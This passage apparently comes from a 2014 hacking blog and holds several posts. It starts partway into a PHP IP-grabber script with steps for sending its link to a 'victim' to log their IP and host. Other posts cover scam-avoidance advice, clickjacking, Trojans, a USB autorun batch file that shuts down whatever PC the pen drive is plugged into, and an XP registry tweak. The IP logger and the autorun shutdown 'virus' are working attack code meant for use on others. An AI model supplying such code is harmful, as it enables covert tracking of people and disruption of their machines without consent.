$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);

header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
---------------------------------------------------------------------

2. Now make Free account on any of the free web hosting sites Ripway or on My3gb , ETC.
3. Now Upload Grab.php to your web hosting site.
4. Copy the link of your uploaded file and send it to victim.
5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
6. Enjoy you are Done !!

Tuesday 27 May 2014

Identify Scammers/Fraudsters !

BY Unknown IN , No comments


Fraudsters Shall Not Pass - Simple Advices On How To Avoid Scammers In Social Networks:
_____________________________________________________

Advices On Avoiding Scammers In Social Networks:
-----------------------------------------------------------
Social networks are always great for communicative people; they make you closer to your friends, relatives and hackers. Social networks are very attractive for such kind of people. You can ask me: “Why do they need that?” All they need is your account. The fraud schemes may be different. But the main aim of them is money. They can ask your relatives for help, especially when you’re far away. Why shouldn’t they believe their own child, when he needs money?

Fraudsters do not disdain playing on the heartstrings. They can write everything, that there’s an accident, you’re in a hospital, etc. So today we’ll study to confront fraudsters and keep our nerves and money safe.

Consequences:
-----------------
The most people don’t think about possible risks when creating their profile on social networks. The more personal and professional information you give, the easier it is for fraudsters to rob you. Let us discuss the easiest scheme. Some criminals are simply searching for people living in the same city to plunder their houses. Why does it happen? Different people are writing perfect information, like “We’re going to visit California next weekends. Hoping it’ll be great” Of course it will be great. For the robber, because now he knows that the house will be empty during weekends and it’s the perfect opportunity for him.

The second thing is the photos. When you’re downloading images and photos on social networks not only your friends like them. It’s also the perfect resource for burglars. From home-made photos, they can receive information about your welfare and house structure. When you have a dog, the robber will be prepared, because everyone has photos with their home pets. That’s why we earnestly advise you not to put in the Internet photos of your house, and some things that can attract robbers, for instance your new car or a brilliant ring.

Advice:
--------
The next our advice – create a complicated password. We’ve just discussed what fraudsters can do with the access to your account, so try to protect yourself, your friends, and relatives as good as you can. Don’t make a password consisting of just your birth date. Remember, that it’s the first combination fraudsters try. Also, don’t put your birth date as the answer to the test question if it’s mail. Check out below article on password cracking.

Let us imagine that you have a complicated password, you don’t download the “rob-attractive” photos and one day you receive the link from your friend where he asks you to vote for him. Stop now. This can be a trap. If you’ll link, the fraudsters receive your personal data, such as login and password. Such scheme is called “fishing”. So, in this case, ask your friend something personal. The other variant is just to make him a call and ask about this. If you’ll receive the answer like “What are you talking about?” you should explain him that he was hacked and offer to change the password. Check out below tutorial to know about popular hacking method used to acquire sensitive information about oneself.

Phones are really helpful things. Explain to your friends and relatives that you can be hacked and if they receive messages with money requests, they must call you at first and ask about that. Remember that your security is in your hands and be careful.

Click Jacking Or Fake Login Layer !

BY Unknown IN , , No comments



What is Clickjacking:
^^^^^^^^^^^^^^^^^^^^
Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable.
when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top 
level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. It may be similar to CSRF Cross Site Request Forgeries Attack.

Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in
2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.
Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they
are typing in the password to their email or bank account, but are instead typing into
an invisible frame controlled by the attacker.
At present this attack mostly use on social network websites like Facebook and twitter, Because this attack is used by convinced victim for click on the link and SocialNetwork website might be very useful for attack on victim.

►WHAT IS A TORJAN VIRUS?

BY Unknown IN , , , No comments


►WHAT IS A TORJAN VIRUS?
A Trojan horse, often shortened to Trojan, is a type of malware designed to provide unauthorized, remote access to a user’s computer. 

Trojan horses do not have the ability to replicate themselves like viruses; however, they can lead to viruses being installed on a machine since they allow the computer to be controlled by the Trojan creator. 

The term gets its name from the Greek story of the Trojan War, when the Greeks offered the Trojans a peace offering in the form of a large wooden horse.

However, once the Trojans wheeled the horse behind their closed gates and night fell, the soldiers hidden inside the horse climbed out and opened the city gates, allowing the Greek army to infiltrate Troy and capture the city.

Trojan horse software operates the same way, where Troy is your computer and the horse is the benign-seeming application. Trojan horses can assist an attacker into turning a user’s computer into a zombie computer, stealing various data such as credit card information, installing more malware, keylogging and various other malicious activities.

Also, it is possible for other crackers to control the compromised computer simply by searching for computers on a network using a port scanner and finding ones that have already been infected with a Trojan horse.

Trojan horses continue to increase in popularity and currently account for the majority of known malware found on the web.

Make Virus To Turn Off PC Whenever USB Is Connected To !

BY Unknown IN , , No comments


Hello BestHacking Readers In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted. Try It to College,school,institute....and Fun With Friends

Step 1:>>copy this code into notepad: 
@echo off
shutdown -s -t 00
Save as besthacking.bat extension (for eg: besthacking.bat). 
Step 2: 
Now open the notepad and copy this code:
[autorun]
Open=besthacking.bat
Action=Mouse Disable

Save it as "autorun.inf"
Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.

Check How to Disable This:-

First Stop Autorun in Your Computer And Then Format Pendrive.. 

Get Free XP Updates Until 2019

BY Unknown IN , No comments


Hack Windows XP to get Security Updates until 2019
______________________________________________________
Microsoft ended its support for Windows XP officially more than a month ago on April 8, 2014.
While some companies and organizations who were not able to migrate their operating system’s running Windows XP to another operating system before the support phase ended, are still receiving updates by paying Microsoft for the security patches and updates.
You are not allowed to directly install these Windows updates for your OS. In order to download new security updates for your Windows XP, you just need to perform a simple intervention into the Windows registration database.
STEPS TO FOLLOW:
------------------------
> Open Notepad and create a new file.
>Add Below given code to it:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\WPA\PosReady]
"Installed"=dword:00000001
>Save file as .reg extension and run it by double clicks.
>Once executed, you will find lots of pending updates in your Windows Action Center.
Because the extended support for Windows Embedded POSReady 2009 systems ends after 5 years, Microsoft will continue to deliver new security updates and patches for this version of its embedded operating system till April 9th, 2019, so users can use this trick to get security updates of Windows XP for another five years.
Important Note for our Readers - Despite receiving security updates for Windows XP by using such tricks, it is not possible to secure the complete system appropriately. So we highly recommend all of you to upgrade your operating system to the latest versions, i.e. Windows 7 or 8 or any Linux Distro.